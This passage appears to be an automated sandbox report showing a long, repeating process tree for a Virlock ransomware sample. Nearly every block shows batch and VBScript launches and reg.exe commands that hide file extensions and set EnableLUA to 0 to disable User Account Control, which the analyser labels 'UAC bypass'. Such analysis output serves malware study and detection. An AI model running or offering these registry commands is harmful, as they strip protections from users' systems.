        cmd /c ""C:\Users\Admin\AppData\Local\Temp\diIEsQAA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        98⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        Modifies registry key
        
        PID:2712
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\fWocIgAA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        96⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        Modifies visibility of file extensions in Explorer
        
        PID:832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        Modifies registry key
        
        PID:1408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        UAC bypass
        
        PID:620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\IYowAwsc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        94⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:1168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        UAC bypass
        
        PID:1684
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\rYoUUgEo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        92⤵
        
        PID:992
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        Modifies registry key
        
        PID:1764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        UAC bypass
        Modifies registry key
        
        PID:2356
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sqkMocIY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        90⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        UAC bypass
        
        PID:1772
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tSgMcwUo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        88⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        Modifies registry key
        
        PID:760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        UAC bypass
        
        PID:2200
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\NQkEQEUI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        86⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        Modifies visibility of file extensions in Explorer
        
        PID:856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        Modifies registry key
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        UAC bypass
        
        PID:1512
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\TGUIMssU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        84⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        UAC bypass
        Modifies registry key
        
        PID:1060
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\xggMYoAo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        82⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        Modifies visibility of file extensions in Explorer
        
        PID:328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        UAC bypass
        Modifies registry key
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ESsQkgwg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        80⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        Modifies registry key
        
        PID:1848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        UAC bypass
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\dgMAMkwg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        78⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        UAC bypass
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\yCQAgUUk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        76⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        Modifies registry key
        
        PID:2588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        UAC bypass
        Modifies registry key
        
        PID:1556
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\jSsYoQUw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        74⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        UAC bypass
        Modifies registry key
        
        PID:3068
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\KkMgIgAk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        72⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        UAC bypass
        Modifies registry key
        
        PID:1848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uuMkkkAw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        70⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        UAC bypass
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\rYYMgAwQ.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        68⤵
        
        PID:888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        Modifies registry key
        
        PID:1448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        UAC bypass
        
        PID:2496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tugQEUgM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        66⤵
        
        PID:840
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        Modifies registry key
        
        PID:2624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        UAC bypass
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sUgMoogg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        64⤵
        
        PID:112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        Modifies visibility of file extensions in Explorer
        
        PID:804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        Modifies registry key
        
        PID:2260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        UAC bypass
        
        PID:2020
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sWQAskkk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        62⤵
        
        PID:908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        UAC bypass
        Modifies registry key
        
        PID:868
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\YwQYYwEY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        60⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        UAC bypass
        Modifies registry key
        
        PID:1984
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\GCckEckA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        58⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        UAC bypass
        Modifies registry key
        
        PID:2704
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\miAscMoc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        56⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        Modifies registry key
        
        PID:1228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        UAC bypass
        
        PID:2040
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VeskAgcc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        54⤵
        
        PID:920
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        Modifies registry key
        
        PID:2712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        UAC bypass
        
        PID:1168
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uAgccgsA.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        52⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        UAC bypass
        Modifies registry key
        
        PID:676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\TuUEAIkM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        50⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        UAC bypass
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZAQkAIEI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        48⤵
        
        PID:1116
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies visibility of file extensions in Explorer
        
        PID:840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        UAC bypass
        
        PID:280
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\UoUcAUUg.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        46⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        Modifies visibility of file extensions in Explorer
        
        PID:312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        UAC bypass
        
        PID:2656
        
        C:\Windows\SysWOW64\cmd.exe
        
